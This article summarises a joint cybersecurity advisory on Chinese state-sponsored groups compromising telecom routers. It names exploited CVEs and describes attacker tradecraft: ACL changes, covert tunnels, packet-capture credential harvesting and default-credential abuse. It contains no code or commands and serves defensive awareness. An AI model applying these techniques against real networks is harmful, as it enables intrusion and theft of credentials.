Chinese state-sponsored cyber espionage campaigns have been reportedly targeting critical sectors across the globe. From telecommunications and government to transportation, lodging, and military operations, cyber actors linked to the People’s Republic of China (PRC) are conducting extensive, stealthy operations to infiltrate and control key network devices. This ongoing cyber onslaught has been documented by leading government agencies, revealing a complex web of tactics designed for long-term access and data extraction.
Since at least 2021, Chinese state-sponsored Advanced Persistent Threat (APT) groups have been actively compromising core networking infrastructure, particularly focusing on large backbone routers within major telecommunications providers. These malicious actors exploit vulnerabilities in provider edge (PE) and customer edge (CE) routers to gain initial access and then move laterally through trusted network connections to infiltrate broader enterprise environments.
Cybersecurity agencies often identify these groups with names such as Salt Typhoon, OPERATOR PANDA, RedMike, UNC5807, and GhostEmperor. Despite different monikers, these actors share similar tactics, techniques, and procedures (TTPs) and are collectively referred to in official advisories simply as “APT actors.” Their reach is global, with confirmed operations in countries including the United States, Australia, Canada, New Zealand, the United Kingdom, and multiple others.
Collaborative Intelligence Efforts
The global nature of this cyber espionage campaign has spurred an unprecedented coalition among international intelligence and cybersecurity agencies. In a joint Cybersecurity Advisory (CSA), organizations such as the U.S. National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Department of Defense Cyber Crime Center (DC3), alongside counterparts from Australia, Canada, New Zealand, the UK, Europe, and Japan, outlined the threat landscape and mitigation strategies.
This unified effort stresses the severity and persistence of the threat, urging network defenders worldwide to proactively hunt for signs of compromise consistent with the observed behaviors of these Chinese state-sponsored actors. Defenders are advised to maintain up-to-date mitigations in compliance with local regulations.
The Anatomy of Chinese Cyber Espionage Operations
Chinese APT actors target telecommunications and internet service providers (ISPs), as well as sectors like lodging and transportation, to harvest data that facilitates global surveillance and intelligence gathering.
Their operations often link back to Chinese entities reportedly providing cyber capabilities to the PRC’s intelligence community, including units within the People’s Liberation Army and the Ministry of State Security. Companies such as Sichuan Juxinhe Network Technology, Beijing Huanyu Tianqiong Information Technology, and Sichuan Zhixin Ruijie Network Technology have been implicated in these efforts.
Cybersecurity firms monitoring this activity have noted the extensive use of publicly known vulnerabilities, Common Vulnerabilities and Exposures (CVEs), to establish initial footholds. While no zero-day exploits have been confirmed, these actors adapt quickly, exploiting weaknesses in routers, firewalls, and switches from global vendors.
Key exploited vulnerabilities include:
- CVE-2024-21887: Ivanti Connect Secure web-component command injection.
- CVE-2024-3400: Palo Alto Networks PAN-OS GlobalProtect remote code execution.
- CVE-2023-20273 & CVE-2023-20198: Cisco IOS XE web management authentication bypass and command injection.
- CVE-2018-0171: Cisco IOS and IOS XE smart install remote code execution.
These flaws allow attackers to remotely execute code, escalate privileges, and commandeer management interfaces, often chaining exploits to seize full control over targeted devices.
Maintaining a Stealthy Foothold
Once inside, Chinese state-sponsored actors modify router configurations to secure persistent access. This includes altering Access Control Lists (ACLs) to allow traffic from attacker-controlled IP addresses and exposing services on both standard and non-standard ports, such as SSH, SFTP, RDP, FTP, HTTP, and HTTPS. These tactics help evade detection by conventional security tools that monitor typical port activity.
Notably, these actors exploit advanced router capabilities such as Cisco’s embedded scripting with Tcl scripts, SNMP enumeration, and embedded Linux containers (Guest Shell environments) to run native commands stealthily. They also employ encrypted tunnels using GRE, multipoint GRE (mGRE), or IPsec protocols, blending command-and-control (C2) traffic with normal network operations for covert communication.
The deployment of multi-hop pivoting tools like STOWAWAY enables encrypted chained relays, facilitating remote shells, file transfers, and proxying through multiple compromised nodes, complicating detection and response efforts.
Harvesting Data Through Native Router Capabilities
Cisco routers are often compromised via a technique that leverages the Native Packet Capture (PCAP) capabilities in CISCO devices. APTs often intercept authentication traffic from TACACS+ and RADIUS protocols, which are used to transmit credentials with weak encryption or often in clear text.
Attackers use Cisco’s Embedded Packet Capture feature to siphon credentials by creating PCAP files with names like “mycap.pcap” or “tac.pcap,” redirecting authentication traffic to attacker-controlled IPs to intercept login credentials.
The manipulation of Authentication, Authorization, and Accounting (AAA) configurations serves to enhance these tactics, allowing attackers to weaken authentication methods or redirect logs to external servers they control.
Post-compromise, Chinese state-sponsored actors create user accounts with elevated privileges, often leveraging weak default credentials (like “cisco”/“cisco”) or cracking hashed passwords stored in router configurations. They scan for open ports and services using SPAN and RSPAN port mirroring, execute commands through SNMP, SSH, and HTTP interfaces, and manipulate routing tables and logs to cover their tracks.
